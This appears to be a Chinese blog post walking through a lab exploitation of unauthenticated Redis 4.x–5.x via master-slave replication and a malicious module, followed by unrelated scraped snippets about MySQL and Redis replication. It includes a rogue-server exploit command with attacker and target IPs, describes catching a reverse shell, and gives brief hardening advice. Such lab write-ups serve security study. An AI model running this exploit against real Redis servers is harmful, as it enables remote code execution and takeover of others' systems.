redis是乙個使用ansi c編寫的開源、支援網路、基於記憶體、可選永續性的鍵值對儲存資料庫。但如果當把資料儲存在單個redis的例項中,當讀寫體量比較大的時候,服務端就很難承受。為了應對這種情況,redis就提供了主從模式,主從模式就是指使用乙個redis例項作為主機,其他例項都作為備份機,其中主機和從機資料相同,而從機只負責讀,主機只負責寫,通過讀寫分離可以大幅度減輕流量的壓力,算是一種通過犧牲空間來換取效率的緩解方式。
在了解了主從同步之後,我們還需要對redis的模組有所了解。
在redis 4.x之後,redis新增了模組功能,通過外部拓展,可以實現在redis中實現乙個新的redis命令,通過寫c語言並編譯出.so檔案。
由此可知,此方式的利用範圍。
redis 4.x-redis 5.x
靶機:ubuntu 18.04.1 ip:192.168.112.132
攻擊機:kali ip:192.168.112.133
一、環境搭建。
1)wget
tar -xvzf redis-5.0.0.tar.gz
cd redis-5.0.0
make
2)不同機器上需更改redis.conf配置檔案
protected-mode yes 改為
protected-mode no
#關閉redis保護模式
bind 127.0.0.1 改為
3)靶機啟動服務
cd src
./redis-server ../redis.conf
#載入指定配置
二、exp準備
用法:python3 redis-rogue-server.py --rhost=192.168.112.132 --lhost=192.168.112.133 --exp=exp.so
三、exploit
彈shell至本機的時候,需輸入攻擊機ip,輸入監聽埠。
監聽,成功。
修復建議:
由於該漏洞利用前提是獲取redis訪問許可權,也就是基於redis未授權訪問。因此可考慮把產生問題的傢伙解決掉。
redis加固:
Mysql主從複製和Redis主從複製的區別
這是學習的時候自己總結的筆記,因為使用typora記筆記,導致太多的筆記分散,所以傳到部落格方便查詢,代表的是typora裡的高亮 mysql主從複製和redis主從複製的區別 複製時機 mysql的主從複製是 從接入點開始 主機之前的資料,從機不會複製 但是redis是 從頭開始備份 主機之前的資...
mysql主從複製
罪過啊,博主最近好久沒有更新部落格了,轉有道雲筆記了,筆記裡還有些乾貨,最近慢慢分享出來吧。博主最近發現有好多想學,但是發現精力有限啊,博主本來是搞個開發的,但是偏偏想把運維,dba的技術全都學了 mysql集群,nginx等等等 但是發現精力有限,所以簡單了解一下,mysql的主從複製,後面還有m...
MySQL 主從複製
1.概念 將主伺服器的資料複製到另外一台或多台伺服器的過程。也即將主資料庫的ddl和dml操作通過二進位制日誌傳到復 務器上,然後在從伺服器上對這些日誌進行重新執行,從而 保持資料同步。2.作用 降低主伺服器的訪問壓力 避免主伺服器因故障導致資料丟失。3.操作步驟 1 主伺服器將資料的改變記錄到二進...